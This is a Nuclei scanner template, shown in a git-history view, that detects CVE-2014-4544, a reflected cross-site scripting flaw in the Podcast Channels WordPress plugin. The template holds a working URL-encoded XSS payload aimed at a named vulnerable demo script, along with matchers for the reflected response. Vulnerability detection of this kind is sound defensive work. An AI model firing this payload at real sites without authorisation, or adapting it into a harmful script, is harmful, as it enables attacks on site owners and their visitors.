my-nuclei-templates/CVE-2014-4544.yaml

41 lines
1.2 KiB
YAML
Raw Permalink Normal View History

2021-11-09 22:49:13 +00:00
id: CVE-2014-4544
info:
2022-06-18 08:05:25 +00:00
name: Podcast Channels < 0.28 - Unauthenticated Reflected Cross-Site Scripting
2021-11-09 22:49:13 +00:00
author: daffainfo
severity: medium
2022-06-18 08:05:25 +00:00
description: The Podcast Channels WordPress plugin was affected by an unauthenticated reflected cross-site scripting security vulnerability.
2021-11-09 22:49:13 +00:00
reference:
- https://wpscan.com/vulnerability/72a5a0e1-e720-45a9-b9d4-ee3144939abb
- https://nvd.nist.gov/vuln/detail/CVE-2014-4544
2022-06-18 08:05:25 +00:00
- http://codevigilant.com/disclosure/wp-plugin-podcast-channels-a3-cross-site-scripting-xss
2021-11-09 22:49:13 +00:00
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
2022-06-18 08:05:25 +00:00
cvss-score: 6.1
2021-11-09 22:49:13 +00:00
cve-id: CVE-2014-4544
cwe-id: CWE-79
2022-06-18 08:05:25 +00:00
tags: cve,cve2014,wordpress,wp-plugin,xss
2021-11-09 22:49:13 +00:00
requests:
- method: GET
path:
2022-06-18 08:05:25 +00:00
- "{{BaseURL}}/wp-content/plugins/podcast-channels/getid3/demos/demo.write.php?Filename=Filename%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&"
2021-11-09 22:49:13 +00:00
matchers-condition: and
matchers:
- type: word
words:
- "</script><script>alert(document.domain)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
2022-06-18 08:05:25 +00:00
# Enhanced by mp on 2022/02/24